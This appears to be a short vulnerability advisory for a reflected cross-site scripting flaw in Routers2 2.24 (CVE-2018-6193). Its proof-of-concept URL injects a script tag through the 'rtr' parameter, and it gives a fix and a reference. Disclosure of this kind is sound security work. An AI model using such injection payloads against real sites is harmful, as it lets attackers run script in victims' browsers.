routers2 2.24 crosssite scripting
▸▸▸ Exploit & Vulnerability >> webapps exploit & perl vulnerability
# Exploit Title: Routers2 2.24 - Reflected Cross-Site Scripting # Date: 18-01-18 # Vendor Homepage: http://www.steveshipway.org/software/ # Software Link: https://github.com/sshipway/routers2 # Version: 2.24 # CVE: CVE-2018-6193 # Platform: Perl # Category: webapps # Exploit Author: Lorenzo Di Fuccia # Contact: lorenzo.difuccia@gmail.com # Website: https://github.com/lorenzodifuccia 1. Description Routers2 is vulnerable to Reflected Cross-Site Scripting, affecting the 'rtr' GET parameter in a page=graph action to `cgi-bin/routers2.pl`. 2. Proof of Concept http://router.com/cgi-bin/routers2.pl?rtr=--><script>alert("XSS")</script>&bars=Cami&xgtype=d&page=graph&xgstyle=l2&xmtype=routers 3. Solution Update the program cloning the repo from GitHub or disable the 'paranoia' setting in the web section of the `routers2.conf`. 4. References https://github.com/sshipway/routers2/issues/1
Routers2 2.24 crosssite scripting Vulnerability / Exploit Source : Routers2 2.24 crosssite scripting